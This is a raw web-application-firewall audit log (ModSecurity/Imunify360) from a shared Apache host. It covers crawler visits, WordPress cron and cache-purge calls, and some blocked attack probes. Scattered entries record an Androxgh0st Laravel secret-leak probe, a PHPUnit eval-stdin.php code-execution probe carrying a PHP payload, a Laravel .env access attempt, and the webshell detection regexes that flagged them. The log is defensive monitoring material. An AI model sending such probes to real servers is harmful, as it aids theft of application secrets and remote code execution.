Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --c2100242-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --c2100242-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751317183102199 561735 (- - -) Stopwatch2: 1751317183102199 561735; combined=786, p1=89, p2=537, p3=0, p4=0, p5=160, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c2100242-Z-- --fa10c130-A-- [01/Jul/2025:02:29:44.712917 +0530] aGL6wIHgoFnbcymQaVAkKwAAAEg 20.171.207.232 34872 192.168.74.40 443 --fa10c130-B-- GET /https/payonewaytaxi.abhaytravelsindia.com/india/aaina/images/aainag/js/Rajasthan-Travel-Guides/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --fa10c130-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --fa10c130-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/payonewaytaxi.abhaytravelsindia.com/india/aaina/images/aainag/js/Rajasthan-Travel-Guides/hotels-udaipur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/payonewaytaxi.abhaytravelsindia.com/india/aaina/images/aainag/js/Rajasthan-Travel-Guides/hotels-udaipur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/payonewaytaxi.abhaytravelsindia.com||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751317184698458 14772 (- - -) -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f1d92f4a-Z-- --3b12b041-A-- [01/Jul/2025:02:30:00.669562 +0530] aGL60OIItec9GLT-rKpbqgAAAC4 196.251.88.57 65409 192.168.74.40 443 --3b12b041-B-- POST / HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 20 Content-Type: application/x-www-form-urlencoded --3b12b041-C-- 0x%5B%5D=androxgh0st --3b12b041-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3b12b041-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "280"] [id "77317941"] [msg "IM360 WAF: Laravel Apps Leaking Secrets exploit attempt||MV:androxgh0st||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751317200563396 106681 (- - -) Stopwatch2: 1751317200563396 106681; combined=1794, p1=175, p2=1188, p3=0, p4=0, p5=431, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3b12b041-Z-- --3cc18163-A-- [01/Jul/2025:02:30:01.037913 +0530] aGL60YHgoFnbcymQaVAkOQAAAEg 20.171.207.232 34872 192.168.74.40 443 --3cc18163-B-- GET /aaina/images/aaina/1/js/aainag/images/rajasthan-tours-from-agra/js/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --3cc18163-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3cc18163-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/aaina/1/js/aainag/images/rajasthan-tours-from-agra/js/hotels-udaipur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/aaina/1/js/aainag/images/rajasthan-tours-from-agra/js/hotels-udaipur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --30b42e1d-Z-- --a4f8515e-A-- [01/Jul/2025:02:30:31.226538 +0530] aGL67zpuhjcLQ5hUuUSW7QAAADc 196.251.88.57 53791 192.168.74.40 80 --a4f8515e-B-- GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: 103.185.74.40 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 19 --a4f8515e-C-- <?php phpinfo(); ?> --a4f8515e-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --a4f8515e-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: default-handler Stopwatch: 1751317231216146 10863 (- - -) Stopwatch2: 1751317231216146 10863; combined=5071, p1=127, p2=4781, p3=0, p4=0, p5=163, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a4f8515e-Z-- --2f86cb1b-A-- [01/Jul/2025:02:30:32.196974 +0530] aGL68KJsAhnLdkyW3uhsVQAAAA8 20.171.207.232 41202 192.168.74.40 443 --2f86cb1b-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/https/images/images/aainag/contact-us.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --2f86cb1b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2f86cb1b-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/https/images/images/aainag/contact-us.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/https/images/images/aainag/contact-us.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-ahmedabad/aainag||"] [severity "DEBUG"] [tag "service_im360"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751318022066489 938296 (- - -) Stopwatch2: 1751318022066489 938296; combined=3128, p1=98, p2=2721, p3=120, p4=6, p5=182, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c63b235e-Z-- --cdbf857c-A-- [01/Jul/2025:02:43:44.136457 +0530] aGL-BqxbJYRWC_Yw6B3qzwAAADE 103.185.74.40 6993 192.168.74.40 443 --cdbf857c-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --cdbf857c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --cdbf857c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751318022659674 1477222 (- - -) Stopwatch2: 1751318022659674 1477222; combined=2296, p1=130, p2=2022, p3=0, p4=0, p5=144, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --cdbf857c-Z-- --8e5b4f0a-A-- [01/Jul/2025:02:43:45.342152 +0530] aGL-CNKDJB_mVgSnS8iu1AAAABU 103.185.74.40 23909 192.168.74.40 443 --8e5b4f0a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --8e5b4f0a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8e5b4f0a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751318024349874 993206 (- - -) Stopwatch2: 1751318024349874 993206; combined=2582, p1=108, p2=2298, p3=0, p4=0, p5=175, sr=47, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8e5b4f0a-Z-- --b2177065-A-- [01/Jul/2025:02:43:46.279668 +0530] aGL-B59d8tphawUWdwJfPwAAACI 81.88.53.143 41394 192.168.74.40 443 --b2177065-B-- POST /xmlrpc.php HTTP/1.1 Host: powerworkout.in User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67 Content-Length: 218 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, zstd, br Accept-Language: fr-FR,fr;q=0.9 Content-Type: application/xml Referer: https://powerworkout.in -- Server: Apache Engine-Mode: "ENABLED" --14bf6b4d-Z-- --be420813-A-- [01/Jul/2025:03:03:49.256343 +0530] aGMCvbBEwvoABJcvUWOYZAAAAAA 172.68.234.68 60722 192.168.74.40 443 --be420813-B-- POST /wp-cron.php?doing_wp_cron=1751319228.4770250320434570312500 HTTP/1.1 Host: nitinspinners.com X-Real-IP: 103.185.74.40 X-Remote-IP: 172.68.234.68 Content-Length: 0 x-forwarded-for: 103.185.74.40 user-agent: WordPress/6.8.1; https://nitinspinners.com content-type: application/x-www-form-urlencoded accept-encoding: gzip, br cf-ray: 9580c8bc8e03e1b7-MRS cf-ipcountry: IN accept: */* cf-visitor: {"scheme":"https"} x-forwarded-proto: https cdn-loop: cloudflare; loops=1 cf-connecting-ip: 103.185.74.40 --be420813-C-- --be420813-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Content-Type: text/html; charset=UTF-8 --be420813-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751319228.4770250320434570312500& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319229238533 18386 (- - -) Stopwatch2: 1751319229238533 18386; combined=6946, p1=130, p2=5964, p3=252, p4=5, p5=595, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --be420813-Z-- --eebf4914-A-- [01/Jul/2025:03:03:49.336744 +0530] aGMCvIqpGWuoJtajeO4ILAAAAAs 216.73.216.38 50107 192.168.74.40 443 --eebf4914-B-- GET /robots.txt HTTP/1.1 accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate host: insightconvey.com --eebf4914-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/8.1.18 X-Robots-Tag: noindex, follow Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 --eebf4914-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/011_i360_otherapps.conf"] [line "434"] [id "77350583"] [msg "IM360 WAF: Scan attempt by claudebot crawler||UA:Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319228271477 1068007 (- - -) Stopwatch2: 1751319228271477 1068007; combined=2108, p1=99, p2=1474, p3=0, p4=0, p5=535, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319912558156 13792 (- - -) Stopwatch2: 1751319912558156 13792; combined=2502, p1=123, p2=2270, p3=0, p4=0, p5=108, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bcb97462-Z-- --8a4c823f-A-- [01/Jul/2025:03:15:12.701464 +0530] aGMFZ2dNAOKbtMBtE6BLmAAAAAk 103.185.74.40 2049 192.168.74.40 443 --8a4c823f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --8a4c823f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8a4c823f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319911038553 1663383 (- - -) Stopwatch2: 1751319911038553 1663383; combined=2240, p1=111, p2=1958, p3=0, p4=0, p5=171, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8a4c823f-Z-- --1e00832f-A-- [01/Jul/2025:03:15:13.762653 +0530] aGMFaS21U70L7ROtKBV4cQAAABo 20.171.207.232 41852 192.168.74.40 443 --1e00832f-B-- GET /https/aainag/images/testimonials/https/images/rajasthan-tours-from-delhi/images/Rajasthan-Travel-Guides/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --1e00832f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1e00832f-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319913746298 16612 (- - -) Stopwatch2: 1751319913746298 16612; combined=3179, p1=137, p2=2922, p3=0, p4=0, p5=120, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1e00832f-Z-- --d9b60779-A-- [01/Jul/2025:03:15:14.137416 +0530] aGMFaCIdO1omawzGqyA-nAAAACs 103.185.74.40 47408 192.168.74.40 443 --d9b60779-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --d9b60779-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d9b60779-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319912913380 1224415 (- - -) Stopwatch2: 1751319912913380 1224415; combined=1827, p1=70, p2=1612, p3=0, p4=0, p5=145, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d9b60779-Z-- --c360754b-A-- [01/Jul/2025:03:15:14.912008 +0530] aGMFai21U70L7ROtKBV4cgAAABo 20.171.207.232 41852 192.168.74.40 443 --c360754b-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/images/https/Rajasthan-Travel-Guides/photo-gallery.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --c360754b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c360754b-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751320267904263 19747 (- - -) Stopwatch2: 1751320267904263 19747; combined=9036, p1=129, p2=8193, p3=311, p4=7, p5=395, sr=0, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2b444b2f-Z-- --05ebfa03-A-- [01/Jul/2025:03:21:08.272139 +0530] aGMGzALlCjD9y3aQUU0L7AAAACI 103.185.74.40 44473 192.168.74.40 443 --05ebfa03-B-- POST /wp-cron.php?doing_wp_cron=1751320268.0429570674896240234375 HTTP/1.1 Host: thewizblog.com User-Agent: WordPress/6.8.1; https://thewizblog.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --05ebfa03-C-- --05ebfa03-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --05ebfa03-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751320268.0429570674896240234375& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751320268255693 16735 (- - -) Stopwatch2: 1751320268255693 16735; combined=5144, p1=115, p2=4330, p3=203, p4=4, p5=491, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --05ebfa03-Z-- --d3886538-A-- [01/Jul/2025:03:21:10.048369 +0530] aGMGzm-2WMWl13laKgZAsQAAABI 172.71.163.149 40910 192.168.74.40 443 --d3886538-B-- POST /contact-enq.php HTTP/1.1 Host: mondofusion.com X-Real-IP: 170.82.180.110 X-Remote-IP: 172.71.163.149 Content-Length: 79 x-forwarded-for: 170.82.180.110 accept-encoding: gzip, br accept-language: en-US,en;q=0.9 upgrade-insecure-requests: 1 content-type: application/json cf-ray: 9580e22318312861-BEL cf-visitor: {"scheme":"https"} cache-control: max-age=0 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751321180894808 18633 (- - -) Stopwatch2: 1751321180894808 18633; combined=4421, p1=187, p2=4101, p3=0, p4=0, p5=133, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c222123e-Z-- --90946c76-A-- [01/Jul/2025:03:36:22.880561 +0530] aGMKXoOKprISmvOCTzCTwAAAAAc 103.185.74.40 22378 192.168.74.40 443 --90946c76-B-- POST /wp-cron.php?doing_wp_cron=1751321182.6481399536132812500000 HTTP/1.1 Host: thewizblog.com User-Agent: WordPress/6.8.1; https://thewizblog.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --90946c76-C-- --90946c76-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --90946c76-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=6725, p1=118, p2=6274, p3=326, p4=7, p5=0, sr=68, sw=0, l=0, gc=0||Py scan:9109||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751321182860680 20169 (- - -) Stopwatch2: 1751321182860680 20169; combined=7161, p1=118, p2=6274, p3=326, p4=7, p5=436, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --90946c76-Z-- --dd5f9f1e-A-- [01/Jul/2025:03:36:27.458680 +0530] aGMKY67KvIAqdeGj7xxYZQAAAB4 57.141.0.5 55032 192.168.74.40 443 --dd5f9f1e-B-- GET /rajasthan-tours-from-udaipur/rajasthan-tours-from-jaipur/rajasthan-tours-from-ahmedabad/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-jodhpur/images/rajasthan-tours-from-jaipur/hotels-udaipur.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --dd5f9f1e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 